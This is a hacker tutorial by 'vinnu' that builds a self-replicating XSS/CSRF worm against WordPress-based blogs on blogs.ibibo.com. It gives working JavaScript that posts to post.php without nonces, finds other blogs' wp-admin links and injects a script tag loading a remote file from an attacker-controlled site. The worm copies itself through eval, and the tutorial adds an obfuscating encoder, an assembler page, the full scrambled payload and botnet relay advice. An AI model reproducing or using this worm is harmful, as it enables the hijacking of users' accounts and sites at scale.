Escolar Documentos
Profissional Documentos
Cultura Documentos
Author: "vinnu"
javascript:var vin=document.getElementsByTagName("form")[0];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);
The above script retrieves the form elements and their values.
So now i had the script (you have to alter above script a
little to increase the form index to a suitable value to reach
the target form as:
javascript:var vin=document.getElementsByTagName("form")[2];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);
"http://blogs.ibibo.com/<your-blog>/wp-admin/"
Page will open. I wrote "Namaste" in title & "Hows the life
there" in content box. It gave me following in a dialogue
box:
It worked and it posted the blog even without the nonce and
referer defined in querystring. But there is a problem.
The script is appearing on the heading and also I wanted
the script to post a different topic everytime it gets executed
so i introduced the well known following circuit for chosing
one of strings out of a list:
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
javascript:blog();
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-
admin/post.php",blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");
javascript:var vin=document.getElementsByTagName("a");var
nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);
But there are also several other items along with blogs.
So my virus must identify the blogs out of other objects.
I checked the pattern.
javascript:test();
function test() {
var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}
Now, i have got a way to identify the blogs out of other objects
and post the random topics.
javascript:trigger();
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};
But i thought the title was not a good place to inject the code
as it will appear in dashboard. So I placed the code in the argument
of post.php named "content" instead of "post_title".
The variable "nunnu" contains the code for a script which retrieves
the remote javascript file at:
http://sites.google.com/site/urcontrolledsite/ibibo.js
Note: The third party free sites are also useful to connect to a botnet if
you do not have any dedicated server. In ur script file at free site like google,
you can place a script that can redirect the requests to ur home computer. This
can
be achieved by using a simplest <script> tag with its "src" attribute defined to
ur
home computer's current IP address. But this makes it necessary to remove such
redirector
scripts or change the IP address everytime you get a new IP address or disconnect.
Otherwise,
the botnet will be orphaned or will end up in chaos.
We need to direct our script to inject itself (whole script) into other
blogs also. This can be achieved by a enclosing whole script into a
string
variable and then using the eval() method.
The eval () method takes a string type argument that holds the code for
execution and executes the code.
So what we can do now is, we have to equate above all code into a
variable
and then feed this very variable to the "content" variable and eval
the variable as in above script.
eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";
This script will fail. It works normally with the lately defined function, but not
with variables.
The above script will work second time, but will fail for first time, So never use
it:
eval(vinnu);var vinnu="alert(document.cookie)";
This is because When it gets executed for first time, eval cannot resolve variable
as variables
should be defined first and called later (Not the case with functions).
But the in second attempt, it already has defined the variable "vinnu" after the
failure of eval
during first execution.
Also the alert() method is added just for debugging purpose and it must be removed
in final product.
\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
Now i have turned whole script into a string variable.
And thats why i have to escape all double and single quotation marks
with a preffixed escape character ( \ ).
"</sc"+"rip"+"t>"
The HTML tags which are appearing within the script are for the
alignment of the Injection Vector of the XSS payload.
The virus is ready. And u can trigger it now from your web-browser's
addressbar while you are already logged in into the blogs.ibibo.com.
But this virus is still in clear text. So why not apply some scrambling
to it. There are some easiest and fast ways to do it (There are also
robust
encryption schemes like DES, SHA, RSA, base64,..etc. But i used the
simplest
to save the processing overhead).
The first call will escape all the special charecters like, /\$#@!~
%^&*()_+|"'
?><,./;:[]{}~` etc into their hex equivalent and second call to escape
will
escape the % signs once again. We can use escape severaltimes. But
remember
to unescape the code equal number of times as:
vinnu = escape(escape(vinnu));
vinnu = unescape(unescape(vinnu));
The encoder:
function z(x) {
x=escape(x);
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="%") {
s="Q";
}else if(s=="i"){s="Z"}else if(s=="a"){s="J";}else if(s=="t")
{s="F";}
else{s=x.charAt(i);}
r+=s;
}return r; }
The decoder:
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) { s=x.charAt(i);
if(s=="Q"){
s="%";
}else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else
if(s=="F"){s="t";}
else{s=x.charAt(i);}
r+=s;
}r=unescape(r);return r;
}
I just replaced"%" with "Q", "i" with "Z", "a" with "J", and "t" with
"F".
Note: There was a bug, it replaced the "Free tibet" to "tree Tibet" because of "F"
<==> "t"
conversion. I noticed it after the infection started. And in the beginning i
couldn't identify
the posts with "tree tibet" topic.
I've used the encoder only once in this case. And the virus code
contained the
scrambled code and a decoder and and eval().
The decoder code was also inside the scramble and while infecting it
should also
place the unscrambled decoder and eval() function in the body of virus.
Once the code executed it will infect other blogs with decoder and eval
attached
at the end of the scrambled code.
But the decoder has a problem in this case. Once it will go under
scrambling, following
code will be interchanged as shown below:
Similarly for other charecters. And the decoder will fail to decode
properly.
So i interchanged the charecters with their hex equivalents and the
decoder
code was changed as shown below:
function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="\x51") {
s="\x25";
}else if(s=="\x5A") {
s="\x69";
}else if(s=="\x4A") {
s="\x61";
}else if(s=="\x46") {
s="\x74";
}else {
s=x.charAt(i);
}r+=s;
}
r=unescape(r);return r;
}
After combining this decoder to the virul code before undergoing the
scrambling,
the beast acquired the following shape:
Remember, try to use variable and function names short to make virul
code compact.
Now I just need to scramble the code. For this purpose I created a HTML
file
containing the code and encoder and decoder. This file will assemble
the virus
and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";
</script>
</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>
</body>
</html>
javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7BvJrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20ZndexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28JddrQ29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5Cx51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurnQ20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q22Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3BquoFeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InFellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3BquoFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3BblpJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ26FJgs_ZnpuFQ3DQ26JcFZonQ3DposF-
quZckpress-
sJveQ26quZckpress_posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxPSLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlhFFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7DelseQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcrosofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Msxml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-form-
urlencodedQ22Q29Q3BxmlhFFp.seFRequesFHeJderQ28Q22ConFenF-
lengFhQ22Q2CpJyloJd.lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';function y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%";}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));
The last alert has been added to the above viral code to make sure
that the virus is properly triggered. It is not a part of virus and
will not be replicated.
This virus is a very good example of artificial living organizms helping each
other for their living.
For example, they have stopped the new blog posts to be submitted now, but They
haven't yet removed the infection and virus is still on blogs.
And this virus having a stage two also available for retrieval of the code.
Thanx a lot..."vinnu"